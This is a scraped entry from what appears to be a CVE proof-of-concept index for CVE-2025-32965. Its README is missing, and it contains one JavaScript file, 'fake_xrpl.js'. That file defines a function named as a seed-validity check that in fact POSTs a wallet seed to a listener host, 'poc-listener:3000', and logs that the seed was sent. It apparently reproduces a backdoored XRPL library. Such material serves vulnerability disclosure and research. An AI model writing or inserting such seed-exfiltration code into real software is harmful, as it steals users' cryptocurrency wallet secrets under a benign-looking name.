4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2025-32965. The file may not exist in the repository.
POC / fake_xrpl.js JS
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "ad-refferal"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };